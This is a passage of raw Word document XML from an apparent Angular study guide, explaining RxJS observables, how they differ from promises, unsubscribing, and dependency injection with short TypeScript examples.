      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model. They are used to </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handle asynchronous data streams</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1DE421"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HTTP requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5C1B2"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r input events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA49F3C"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imers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427D84E8"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ebSocket connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64609664"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Angular uses </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RxJS (Reactive Extensions for JavaScript)</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to provide observables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6876598F" w14:textId="77777777" w:rsidR="00AC716D"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7C4D541">
          <v:rect id="_x0000_i3528" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F56BDFC" w14:textId="77777777" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716D"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Core Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC329C3"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An </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Observable</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> emits data over time, and you can </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribe</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to it to react to the emitted data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2326070B"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st observable = new Observable(observer =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E8E560"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observer.next('Hello');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B44613"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observer.next('World');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF13B91"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observer.complete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0486FC7A"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49907CC8" w14:textId="77777777" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716D" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470FE1CB"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observable.subscribe(val =&gt; console.log(val));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4755FA1E"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📤</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486934C7"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Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A9502"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orld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3119F" w14:textId="77777777" w:rsidR="00AC716D"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536045D">
          <v:rect id="_x0000_i3529" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3957B477" w14:textId="77777777" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716D"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Common Use Case – HTTP Calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B2F971"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his.http.get&lt;Employee[]&gt;('api/employees')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11185772"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subscribe(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF5966"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his.employees = data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C75859B"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33936659"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http.get() returns an Observable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CA3268"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lastRenderedPageBreak/>
        <w:t>.subscribe() gets the response when ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFCA3F6" w14:textId="77777777" w:rsidR="00AC716D"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452573F">
          <v:rect id="_x0000_i3530" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2AE896" w14:textId="77777777" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716D"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Observable vs Promis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5"/>
        <w:gridCol w:w="2774"/>
        <w:gridCol w:w="1514"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="6B39024A" w14:textId="77777777" w:rsidTr="00AC716D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B29A2A0" w14:textId="77777777" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716D"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4750AFB0" w14:textId="77777777" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716D"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Observable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D70CB6D" w14:textId="77777777" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716D"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Promise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="628362CF" w14:textId="77777777" w:rsidTr="00AC716D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0519CE18"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Multiple values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A040FE9"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="003C7C02">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18E34965"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="003C7C02">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="0E35D998" w14:textId="77777777" w:rsidTr="00AC716D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6572851A"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Lazy execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7569117B"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="003C7C02">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Yes (runs on subscribe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AD0901F"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="003C7C02">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="60CBA095" w14:textId="77777777" w:rsidTr="00AC716D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42E95803"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ancelable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CE242FC"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="003C7C02">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Yes (unsubscribe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F30737E"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="003C7C02">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="3D7A7F58" w14:textId="77777777" w:rsidTr="00AC716D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EDC5EF9"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Operators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67347768"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="003C7C02">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Many via RxJS (map, filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62D5C1D9"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="003C7C02">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Very limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F7420D2" w14:textId="77777777" w:rsidR="00AC716D"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5EA0891">
          <v:rect id="_x0000_i3531" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="451BE790" w14:textId="77777777" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716D"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Unsubscribing from Observables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8F5FE5"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o avoid memory leaks, unsubscribe when you're done:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495EB333"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ngOnDestroy() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D91A7"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his.subscription.unsubscribe();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1099A39D" w14:textId="77777777" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716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7C6E4E4A" w14:textId="76E07423" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="6334AD12">
          <v:rect id="_x0000_i3532" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F43CD4" w14:textId="789C3E46" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="003C680B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="868" w:name="_Toc196308348"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to implement dependency injection in angular</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="868"/>
    </w:p>
    <w:p w14:paraId="7DCA2C74" w14:textId="3E1CFDC6" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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How to Implement Dependency Injection (DI) in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50185A39"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Angular has a built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> system that helps manage service instances and inject them where needed (like in components, directives, pipes, or other services).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514A0EC1" w14:textId="77777777" w:rsidR="00895951"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6757908">
          <v:rect id="_x0000_i3533" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2124D7FC" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951"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1. Create a Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7E982B"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ng generate service data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA07740"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his creates data.service.ts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530B8C9E"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njectable({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E7657"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providedIn: 'root' // registers service in root injector (singleton)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AEEBDB"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159AFAF7"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DataService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A975D"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getData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ADCF7C"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return ['Item 1', 'Item 2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD95E6"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5F6C67D4"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5CD81099" w14:textId="77777777" w:rsidR="00895951"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3B0DE01">
          <v:rect id="_x0000_i3534" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68019C97" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951"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2. Inject Service into a Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E132FC"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 Component, OnInit } from '@angular/core';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6DB720"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 DataService } from './data.service';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E172EB3" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A676E68"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mponent({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D035C68"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selector: 'app-my-component',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FCC656"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emplateUrl: './my-component.component.html'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2051D92A"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7F04E6E9"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MyComponent implements OnInit {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1B83DC" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9E7BA5"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items: string[] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA31FF" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="375CE14C"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constructor(private dataService: DataService) { } // &lt;-- DI happens here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013BFC67" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754E9C15"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ngOnInit() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6D953"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his.items = this.dataService.getData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C28BB"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42037722"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19FE2E18" w14:textId="77777777" w:rsidR="00895951"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341ABC0">
          <v:rect id="_x0000_i3535" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B00EC" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951"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3. Providing Service Locally (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9F2C09"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f you want a new instance per component (not singleton), you can provide it at the component level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6927FE"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lastRenderedPageBreak/>
        <w:t>@Component({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43300321"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selector: 'app-sample',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F4EA3F"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emplateUrl: './sample.component.html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CB43E3"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providers: [DataService] // creates a new instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F81C80"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066A4DD2" w14:textId="77777777" w:rsidR="00895951"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966A0FE">
          <v:rect id="_x0000_i3536" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3738134F" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951"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Angular DI Uses the Following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77"/>
        <w:gridCol w:w="5292"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="4416142F" w14:textId="77777777" w:rsidTr="00895951">
        <w:trPr>
          <w:tblHeader/>
